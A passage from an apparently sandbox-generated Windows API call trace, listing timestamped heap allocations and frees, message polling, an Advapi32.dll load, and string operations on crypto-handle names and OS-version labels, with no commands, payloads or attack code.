RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0251.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0251.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0251.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0251.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0251.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0251.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0251.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0251.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0251.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0251.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0251.930] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0251.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0251.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0251.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.931] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.931] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0251.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0251.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0251.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0251.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0251.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0251.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0251.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.932] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0251.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0251.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.933] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0251.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0251.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0251.934] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.934] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0251.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0251.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0251.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0251.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0251.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0251.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0251.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0251.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0251.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0251.935] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0251.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0251.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0251.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0251.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0251.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0251.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0251.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0251.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0251.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0251.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0251.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0251.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0251.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0251.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0251.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0251.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 